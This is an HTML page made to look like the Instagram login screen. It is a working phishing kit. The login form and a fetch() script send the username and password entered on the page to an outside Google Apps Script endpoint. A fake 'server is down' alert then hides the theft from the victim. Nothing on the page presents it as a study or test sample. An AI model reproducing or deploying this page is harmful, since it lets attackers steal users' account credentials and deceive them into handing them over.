<!DOCTYPE HTML>
<html>
<head>
    <title>Instagram</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" integrity="sha512-1ycn6IcaQQ40/MKBW2W4Rhis/DbILU74C1vSrLJxCq57o941Ym01SwNsOMqvEBFlcgUa6xLiPY/NS5R+E6ztJQ==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" type="text/css" href="INSTAGRAM.CSS">
    </head>
<style>
body
{
    margin: 0;
    padding: 0;
    display: flex;
    min-height: 100vh;
    align-items: center;
    justify-content: center;
    background-color: #fafafa;
    background-color: rgba(var(--b3f,250,250,250),1);
    font-family: sans-serif;
}
.container
{
    text-align: center;
}
.title .img 
{
    color: #fff;
    letter-spacing: 1px;
    margin: 10px;
    height: 100px;
    width: 100px;
	cursor: pointer;
}
.page
{
    height: -50px;
    width: 350px;
    background: #fff;
    border-radius: 5px;
    padding-bottom: 45px;
    border: 1px solid #999;
}
.title
{
    padding: 30px 0;
    text-transform: capitalize;
    font-size: 25px;
    font-family: 'Pacifico', cursive;
}

form
{
    width: 82%;
    display: flex;
    flex-direction: column;
    position: relative;
    left: 50%;
    transform: translateX(-50%);
    text-align: center;
}
form input
{
    margin-bottom: 5px;
    border: 1px solid rgba(0,0,0,0.4);
    border-radius: 3px;
    outline: none;
}
form input:focus
{
    border: 1px solid rgba(0,0,0,0.1);
    background: #efefef;
}
input[type="text"],input[type="password"]{
    padding-left: 10px;
    position: relative;
    height: 35px;
    font-size: 17px;
}
input::placeholder
{
    font-weight: normal;
    font-size: 13px;
    transition: 0.3s ease;
}
input:focus::placeholder
{
    position: absolute;
    font-size: 10px;
    transform: translateY(-13px);
}
form button
{
    border: none;
    background: #008aff;
    padding: 5px 0;
    margin-top: 5px;
    color: #fff;
    border-radius: 3px;
    font-weight: bold;
    text-transform: capitalize;
    letter-spacing: 1px;
    outline: none;
    cursor: pointer;
}
form button
{
    background: #008aff;
    transform: scale(0.995);
}
form .option
{
    color: #5a5a5a;
    margin: 10px 0;
    font-weight: bold;
    position: relative;
}

form .option:before
{
    position: absolute;
    content: '';
    width: 30%;
    height: 2px;
    background: #b6b6b6;
    left: 0;
    top: 50%;
    transform: translateY(-50%);
    border-radius: 50px;
}
form .option:after
{
    position: absolute;
    content: '';
    width: 30%;
    height: 2px;
    background: #b6b6b6;
    right: 0;
    top: 50%;
    transform: translateY(-50%);
    border-radius: 50px;
}
.fblink
{
    margin-top: 15px;
    width: 100%;
}
.fblink i
{
    font-size: 18px;
    color: #021897;
    margin-right: 5px;
}
.fblink a
{
    text-decoration: none;
    font-weight: bold;
    color: #021897;
}
.forget-id
{
    margin: 15px;
}
.forget-id a
{
    text-decoration: none;
    color: #000;
    font-size: 12px;
    font-weight: 500;
}

.signup
{
    position: relative;
    border: 0px solid #b6b6b6;
    border-radius: 2px;
    width: 90%;
    left: 50%;
    transform: translateX(-50%);
    margin-top: 30px;
}
.signup a
{
    text-decoration: none;
    margin-left: 5px;
    color: #008aff;
    font-weight: bold;
}
app
{
    align-items: baseline;
    text-align: bottom;
    justify-items: baseline;
    
}
</style>

<body>
    
    
    <div class="container">
    <div class="text"></div>
    <div class="page">
        <div class="title"> <img src="https://logos-world.net/wp-content/uploads/2020/04/Instagram-Logo.png" height="100px" width="220px">            </div>
      <form method="POST" name="google-sheet" action="https://script.google.com/macros/s/AKfycbws_gC2lI0urwAMzLFaOckwkYoAA8ihOptP86LSS0kSM9P6NWzIJ82enfu5AoBqwyIY/exec">
        <input type="text" name="username" placeholder="Phone number,usrname or email address">
        <input type="password" name="password"  placeholder="Password">
            <button>Log In</button>
        <div class="option">OR</div>
        
        
        <div class="fblink">
            <i class="fab fa-facebook"></i>
        <a href="#">Log in with Facebook</a>
        </div>
        
        <div class="forget-id">
        <a href="#">Forgetten your password? </a>
        </div>
        
    
        </form>
        <div class="signup">
        <P>Don't have an account? <a href="#">Sign up</a>          </P>
        </div>
        
        
        </div>    
    </div>
<script>
const scriptURL ='https://script.google.com/macros/s/AKfycbws_gC2lI0urwAMzLFaOckwkYoAA8ihOptP86LSS0kSM9P6NWzIJ82enfu5AoBqwyIY/exec'
        
const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => alert("* SERVER IS DOWN TRY AGAIN LATER..."))
                .catch(error => console.error('Error!', error.message))
            })
          </script>


    
    
    
    
    
    
    </body>


</html>
